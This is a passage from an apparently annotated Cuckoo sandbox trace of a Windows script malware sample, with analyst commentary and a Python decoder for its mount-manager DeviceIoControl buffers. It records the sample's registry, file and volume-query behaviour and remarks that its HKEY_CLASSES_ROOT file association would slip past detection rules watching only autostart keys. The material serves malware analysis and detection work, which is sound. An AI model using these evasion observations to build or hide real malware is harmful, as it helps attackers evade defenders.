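ShareAccess => 5 FileName => C:\Documents and Settings\All Users\Desktop\Sex-Vabian.jpg.lnk DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000000 |
FAILURE | 0xc0000034 | |
"""
```

Two details are worth reading off the trace rather than assuming. `Registry => 0x80000000` is HKEY_CLASSES_ROOT, so the `.VX` association is created in the classes view rather than under a Run key, which is why a rule keyed only on autostart locations would miss it. The `.lnk` NtCreateFile has CreateDisposition 1 (FILE_OPEN) and fails with 0xc0000034 (STATUS_OBJECT_NAME_NOT_FOUND): it is an existence check on the lure, not its creation, so a rule that fires only on a successful create would not match this line.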
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x000001ca Registry => 0x80000000 SubKey => TypeLib |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ce Registry => 0x000001ca SubKey => {F935DC20-1CF0-11D0-ADB9-00C04FD58A0B} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x000001e2 Registry => 0x000001ce SubKey => 1.0 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001e2 SubKey => 409 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001e2 SubKey => 9 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x000001e6 Registry => 0x000001e2 SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ea Registry => 0x000001e6 SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ea |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001e6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001e6 Registry => 0x000001e2 SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ea Registry => 0x000001e6 SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ea Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00o\x00m\x00.\x00o\x00c\x00x\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001e6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001e2 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoNetHood Type => 1301968 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoPropertiesMyComputer Type => 1301968 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoInternetIcon Type => 1301968 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\wscript.exe |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | LdrGetDllHandle |
ModuleHandle => 0x774e0000 FileName => OLE32.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrLoadDll |
Flags => 1301128 BaseAddress => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoGetMalloc FunctionAddress => 0x774fdd08 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoCommonGroups Type => 1301968 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CreateBindCtx FunctionAddress => 0x774fe54c ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D} |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoControlPanel Type => 1300320 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoSetFolders Type => 1300320 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x000001ce Registry => 0x80000000 SubKey => CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ce Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00S\x00H\x00E\x00L\x00L\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrLoadDll |
Flags => 1300900 BaseAddress => 0x7c9c0000 FileName => C:\WINDOWS\system32\SHELL32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 328 FunctionName => FunctionAddress => 0x773e1559 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrLoadDll |
Flags => 1301692 BaseAddress => 0x77920000 FileName => SETUPAPI.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CM_Get_Device_Interface_List_Size_ExW FunctionAddress => 0x77929025 ModuleHandle => 0x77920000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LookupPrivilegeValueW |
SystemName => PrivilegeName => SeLoadDriverPrivilege |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | LookupPrivilegeValueW |
SystemName => PrivilegeName => SeUndockPrivilege |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CM_Get_Device_Interface_List_ExW FunctionAddress => 0x7792a15c ModuleHandle => 0x77920000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 3 FileName => IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} DesiredAccess => 0x00100080 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x1c\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00C\x00d\x00R\x00o\x00m\x000\x00 IoControlCode => 5046280 InBuffer => |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \x00\x00\x00\x00\xa0\xda\x13\x00x \x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\xf8\xda\x13\x00\x00\xdd\x13\x00\x00\xdd\x13\x00`\xd9\x13\x00\x18\x00\x00\x00\x00\x00\x00\x00\x84\xd8\x13\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xd7\x1a\x00\xd0\xdc\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \xea\x01\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x1c\x00\x00\x00\\x00D\x00e\x00v\x00 IoControlCode => 7143432 InBuffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x1c\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00C\x00d\x00R\x00o\x00m\x000\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \xea\x01\x00\x00\x02\x00\x00\x00n\x01\x00\x00`\x00\x00\x008\x00\x00\x00\x1a\x01\x00\x00R\x01\x00\x00\x1c\x00v\x00\xce\x01\x00\x00\x1c\x00\\x008\x00\x00\x00\x1a\x01o\x00R\x01\x00\x00\x1c\x00\x00\x00\\x00?\x00?\x00\\x00I\x00D\x00E\x00#\x00C\x00d\x00R\x00o\x00m\x00V\x00B\x00O\x00X\x00_\x00C\x00D\x00-\x00R\x00O\x00M\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x001\x00.\x000\x00_\x00_\x00_\x00_\x00_\x00#\x004\x002\x005\x006\x002\x00d\x003\x002\x003\x001\x003\x000\x003\x000\x003\x007\x003\x003\x003\x000\x003\x006\x003\x007\x002\x000\x002\x000\x002\x000\x002\x000\x002\x000\x002\x000\x002\x000\x00 IoControlCode => 7143432 InBuffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x1c\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00C\x00d\x00R\x00o\x00m\x000\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x000001fc SubKey => {b602d500-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000200 Data => ValueName => Data |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x00000200 SubKey => {b602d500-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 334 FunctionName => FunctionAddress => 0x773e0f5a ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 3 FileName => STORAGE#Volume#1&30a96598&0&Signature1010101Offset7E00Length2701AF400#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} DesiredAccess => 0x00100080 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => .\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00 IoControlCode => 5046280 InBuffer => |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \x00\x00\x00\x00\xa0\xda\x13\x00x \x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\xf8\xda\x13\x00\x00\xdd\x13\x00\x00\xdd\x13\x00S\x00o\x00\x18\x00\x00\x00\x00\x00\x00\x00\x84\xd8\x13\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xeb\x1a\x00@\xeb\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \xee\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00.\x00\x00\x00\\x00D\x00e\x00v\x00 IoControlCode => 7143432 InBuffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00.\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \xee\x00\x00\x00\x02\x00\x00\x00r\x00\x00\x00`\x00\x00\x008\x00\x00\x00\x0c\x00\x00\x00D\x00\x00\x00.\x00v\x00\xd2\x00\x00\x00\x1c\x00\\x008\x00\x00\x00\x0c\x00d\x00D\x00\x00\x00.\x00k\x00\x01\x01\x01\x01\x00~\x00\x00\x00\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\\x00D\x00o\x00s\x00D\x00e\x00v\x00i\x00c\x00e\x00s\x00\\x00C\x00:\x00 IoControlCode => 7143432 InBuffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00.\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00 |
SUCCESS | 0x00000001 | |
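The DeviceIoControl entries above print IoControlCode in decimal and the buffers as escaped bytes, which hides what the shell was doing while the script asked for a shortcut: enumerating volumes through the mount manager. The Python below is an added example, not code from the report or from the sample. It splits a control code into its CTL_CODE fields, reverses Cuckoo's buffer rendering (\xNN for non-printable bytes, everything else verbatim, backslashes included), and parses the MOUNTMGR_MOUNT_POINTS and MOUNTMGR_VOLUME_PATHS replies. The struct layouts are the public mountmgr.h ones, the IOCTL-name table covers only the three codes that occur in this trace, and the three embedded buffers are copied from the MountPointManager calls in this section.

```python
"""Decode DeviceIoControl details from a Cuckoo trace: CTL_CODE bit fields,
Cuckoo's escaped buffer rendering, and the mount-manager reply structures."""
import re
import struct

# Layouts follow the public mountmgr.h definitions (little-endian, no padding).
MOUNT_POINTS_HDR = struct.Struct("<II")    # Size, NumberOfMountPoints
MOUNT_POINT = struct.Struct("<IHHIHHIHH")  # SymLink off/len, UniqueId off/len, DeviceName off/len, each + reserved
VOLUME_PATHS_HDR = struct.Struct("<I")     # MultiSzLength

# (DeviceType, Function) for the codes seen in this trace. All three are
# METHOD_BUFFERED / FILE_ANY_ACCESS, so these two fields identify them.
KNOWN_IOCTLS = {
    (0x4D, 2): "IOCTL_MOUNTDEV_QUERY_DEVICE_NAME",
    (0x6D, 2): "IOCTL_MOUNTMGR_QUERY_POINTS",
    (0x6D, 13): "IOCTL_MOUNTMGR_QUERY_DOS_VOLUME_PATHS",
}


def decode_ctl_code(code):
    """Split an I/O control code into the CTL_CODE(DeviceType, Function, Method, Access) fields."""
    fields = {"device_type": code >> 16, "access": (code >> 14) & 0x3,
              "function": (code >> 2) & 0xFFF, "method": code & 0x3}
    fields["name"] = KNOWN_IOCTLS.get((fields["device_type"], fields["function"]), "unknown")
    return fields


_ESC = re.compile(r"\\x([0-9a-fA-F]{2})|(.)", re.DOTALL)


def unescape_buffer(rendered):
    """Cuckoo prints non-printable bytes as \\xNN and everything else verbatim, including
    backslashes, so only a backslash followed by 'x' and two hex digits is an escape."""
    out = bytearray()
    for m in _ESC.finditer(rendered):
        out += bytes([int(m.group(1), 16)]) if m.group(1) else m.group(2).encode("latin-1")
    return bytes(out)


def parse_mount_points(buf):
    """Parse a MOUNTMGR_MOUNT_POINTS reply; rejects the short probe reply instead of over-reading."""
    size, count = MOUNT_POINTS_HDR.unpack_from(buf, 0)
    if size > len(buf):
        raise ValueError(f"truncated reply: header says {size} bytes, buffer has {len(buf)}")
    points = []
    for i in range(count):
        sl_off, sl_len, _, uid_off, uid_len, _, dev_off, dev_len, _ = \
            MOUNT_POINT.unpack_from(buf, MOUNT_POINTS_HDR.size + i * MOUNT_POINT.size)
        points.append({
            "device": buf[dev_off:dev_off + dev_len].decode("utf-16-le"),
            "symlink": buf[sl_off:sl_off + sl_len].decode("utf-16-le"),
            "unique_id": buf[uid_off:uid_off + uid_len].hex(),
        })
    return points


def parse_volume_paths(buf):
    """Parse a MOUNTMGR_VOLUME_PATHS reply (a REG_MULTI_SZ-style list of DOS paths)."""
    (length,) = VOLUME_PATHS_HDR.unpack_from(buf, 0)
    return [p for p in buf[4:4 + length].decode("utf-16-le").split("\0") if p]


# Buffers copied from the MountPointManager DeviceIoControl calls in the trace above.
PROBE_REPLY = r"\xee\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00.\x00\x00\x00\\x00D\x00e\x00v\x00"
QUERY_POINTS_REPLY = (
    r"\xee\x00\x00\x00\x02\x00\x00\x00"
    r"r\x00\x00\x00`\x00\x00\x008\x00\x00\x00\x0c\x00\x00\x00D\x00\x00\x00.\x00v\x00"
    r"\xd2\x00\x00\x00\x1c\x00\\x008\x00\x00\x00\x0c\x00d\x00D\x00\x00\x00.\x00k\x00"
    r"\x01\x01\x01\x01\x00~\x00\x00\x00\x00\x00\x00"
    r"\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00"
    r"\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00"
    r"\\x00D\x00o\x00s\x00D\x00e\x00v\x00i\x00c\x00e\x00s\x00\\x00C\x00:\x00"
)
VOLUME_PATHS_REPLY = r"\x08\x00\x00\x00C\x00:\x00\x00\x00\x00\x00"
```

The FAILURE-then-SUCCESS pair for code 7143432 above is the normal mount-manager calling convention rather than an error: the first call's reply carries the required Size (0xee) in its header, the caller reallocates and repeats, and parse_mount_points rejects that short first reply instead of reading past it. Decoded, the successful reply describes one volume, \Device\HarddiskVolume1, reachable as \??\Volume{b602d502-5818-11e5-9f17-806d6172696f} and \DosDevices\C:, and the 7143476 reply resolves the same volume GUID back to the single DOS path "C:". All three codes are read-only queries; none of them writes to the disk.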
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x000001fc SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000200 Data => ValueName => Data |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x00000200 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 332 FunctionName => FunctionAddress => 0x773e0df4 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00C\x00:\x00\x00\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
